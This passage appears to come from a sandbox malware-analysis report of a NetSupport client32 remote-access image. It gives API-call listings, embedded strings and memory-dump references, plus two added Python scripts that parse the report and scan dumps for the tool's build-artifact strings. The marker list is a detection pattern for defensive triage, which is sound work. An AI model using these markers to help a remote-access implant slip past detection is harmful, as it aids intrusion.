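    return sorted({p.rsplit("\\", 2)[0] for p in paths if re.match(r"[a-z]:\\", p, re.I)})


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    print(len(recs), "records, image base", hex(recs[0].base))
    print("fatal-exit paths:", fatal_exit_paths(recs))
    print("source paths:", source_paths(recs), "build roots:", build_roots(source_paths(recs)))
```

To run it over a full export, pass the file contents to parse_report. The drive-rooted build path is the token worth carrying into a rule; the relative ..\ctl32\ paths are weaker on their own, and a record whose only route to ExitProcess is a 'Part of subcall function' entry is a caller of the shared assert handler, not the handler itself.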
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 111715AE
                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                • __amsg_exit.LIBCMT ref: 111715CE
                                                                                • __lock.LIBCMT ref: 111715DE
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                • _free.LIBCMT ref: 1117160E
                                                                                • InterlockedIncrement.KERNEL32(012F16D0), ref: 11171626
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2857295742-0
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                Strings
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                • API String ID: 2477883239-2305317391
                                                                                APIs
                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                • EqualRect.USER32(?,?), ref: 1107740C
                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11077447
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2754115966-2830328467
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 1104971C
                                                                                • _free.LIBCMT ref: 11049779
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                • CLTCONN.CPP, xrefs: 11049708
                                                                                • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                • API String ID: 3300666597-3188990991
                                                                                APIs
                                                                                • PostThreadMessageA.USER32(11027105,752BF08B,68575608,11199F9C), ref: 1109DBB6
                                                                                • SendMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DBEF
                                                                                  • Part of subcall function 1109DA70: IsWindow.USER32(?), ref: 1109DA8F
                                                                                  • Part of subcall function 1109DA70: GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
                                                                                  • Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DAE1
                                                                                  • Part of subcall function 1109DA70: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
                                                                                  • Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DB0D
                                                                                • PostMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DC0B
                                                                                Strings
                                                                                • ..\CTL32\ipc.cpp, xrefs: 1109DB8D
                                                                                • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109DB92
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                • API String ID: 3524374798-1411620790
                                                                                • Opcode ID: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                • Instruction ID: f7862f93581c5bca8d7b47be27161d917c1b37376ee9b6c345dd63ee61fb1edc
                                                                                • Opcode Fuzzy Hash: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                • Instruction Fuzzy Hash: 0121737574060AEFD314CF59D990D6BF3E9FB88324B10852AE55A87A40D730FC50DB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strncpy$wsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 2895084632-1363028141
                                                                                • Opcode ID: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                • Instruction ID: 0ad2666efbab1ef8cbc868768b6c2378956e4de7a80f96389552179b7afbf64e
                                                                                • Opcode Fuzzy Hash: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                • Instruction Fuzzy Hash: D731AF76900B02AFC324DF65C890EA3B7A9FF88318B04455DE64A8BE40E775F464CB90
                                                                                APIs
                                                                                • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 111438FE
                                                                                • _memmove.LIBCMT ref: 1114394D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProfileString_memmove
                                                                                • String ID: ,,LPT1:$Device$Windows
                                                                                • API String ID: 1665476579-2967085602
                                                                                • Opcode ID: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                • Instruction ID: 055e85ea75ba770a70e20350d0a84ef6a9c3bf4bb9e235a47bfd0f5fb1665b7d
                                                                                • Opcode Fuzzy Hash: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                • Instruction Fuzzy Hash: E0113B39918267AADB119F70ED41BF9FB68EF55708F1000A8DD8597242FB326609C7B2
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 110BD4A4
                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                                • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110BD493
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 381722633-2830328467
                                                                                • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrementVersion
                                                                                • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                • API String ID: 1284810544-229394064
                                                                                • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                APIs
                                                                                • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                • RegisterClassA.USER32(?), ref: 11093483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassLoad$CursorIconInfoRegister
                                                                                • String ID: NSMClassList
                                                                                • API String ID: 2883182437-2474587545
                                                                                • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
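The function listings above leak a set of build-time strings that survive in the mapped client32 image: the NSMClassList window class passed to GetClassInfoA/RegisterClassA, the e:\nsmsrc\nsm\1210\1210f\ source path and the ..\CTL32\ipc.cpp / ..\ctl32\util.cpp assertion file names, the EnableAudioHook trace format, and the Hardware Profiles registry path. The script below is an added example for triaging a memory dump or PE image with those strings; it is not Joe Sandbox output and not NetSupport code. It reports hits as virtual addresses relative to the dump base (0x11000000 in this report), extracts the build tag from the nsmsrc path, and only calls the image NetSupport client32 when markers from at least two independent categories are present, so a generic string such as the registry path cannot trigger on its own. The category labels, the two-category threshold and the sample buffer are assumptions constructed for the example.

```python
"""Triage a memory dump or PE image for NetSupport client32 build artifacts.

Added example; the marker strings are copied from the report listings, the
category grouping and threshold are our own assumptions.
"""
import re
from typing import Dict, List, Optional

# Literal strings from the function listings.  Category names are hypothetical.
NETSUPPORT_MARKERS: Dict[str, List[bytes]] = {
    "build_path": [
        b"e:\\nsmsrc\\nsm\\",
        b"..\\CTL32\\ipc.cpp",
        b"..\\ctl32\\util.cpp",
        b"CLTCONN.CPP",
    ],
    "window_class": [b"NSMClassList"],
    "assert_text": [
        b"m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)",
        b"idata->pSmartcardDevice == theSmartcardDevice",
        b"i < cchBuf",
    ],
    "trace_format": [b"EnableAudioHook(%d, %d), gCount=%d"],
    "registry_path": [
        b"SYSTEM\\CurrentControlSet\\Hardware Profiles\\Current\\System\\CurrentControlSet\\Enum",
    ],
}

# Path layout seen in the report: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h
BUILD_PATH_RE = re.compile(rb"e:\\nsmsrc\\nsm\\(\d+)\\([0-9a-z]+)\\", re.IGNORECASE)


def scan(blob: bytes, base: int = 0) -> Dict[str, Dict[str, List[int]]]:
    """Return {category: {marker: [addresses]}} for every marker found.

    `base` is added to each file offset so hits can be quoted as virtual
    addresses next to the report's xrefs (this dump is based at 0x11000000).
    """
    hits: Dict[str, Dict[str, List[int]]] = {}
    for category, markers in NETSUPPORT_MARKERS.items():
        for marker in markers:
            addrs = [m.start() + base for m in re.finditer(re.escape(marker), blob)]
            if addrs:
                hits.setdefault(category, {})[marker.decode("ascii")] = addrs
    return hits


def extract_build(blob: bytes) -> Optional[str]:
    """Pull the build tag (e.g. '1210f') out of an embedded nsmsrc path."""
    m = BUILD_PATH_RE.search(blob)
    return m.group(2).decode("ascii") if m else None


def is_netsupport_client32(blob: bytes, min_categories: int = 2) -> bool:
    """Require hits in at least `min_categories` independent categories so a
    single generic string (for example the registry path) is not enough."""
    return len(scan(blob)) >= min_categories


def build_sample() -> bytes:
    """Constructed stand-in for a memory dump; not data from the sandbox run."""
    filler = b"\x00" * 64
    return (
        filler + b"NSMClassList\x00" + filler
        + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h\x00" + filler
        + b"m_hWnd\x00"
        + b"EnableAudioHook(%d, %d), gCount=%d\x00" + filler
    )


if __name__ == "__main__":
    sample = build_sample()
    for category, found in scan(sample, base=0x11000000).items():
        for marker, addrs in found.items():
            print(f"{category:14} {marker!r:50} at {', '.join(f'{a:08X}' for a in addrs)}")
    print("build:", extract_build(sample))
    print("verdict:", is_netsupport_client32(sample))
```

To run it against the real dump, read the .sdmp file listed under Memory Dump Source into `blob` and pass `base=0x11000000` so the reported addresses line up with the xrefs in this report; the two-category threshold is a triage heuristic, not a signature, and a packed or string-encrypted build will not be caught by literal matching.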
                                                                                APIs
                                                                                • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                • wsprintfA.USER32 ref: 1114568E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
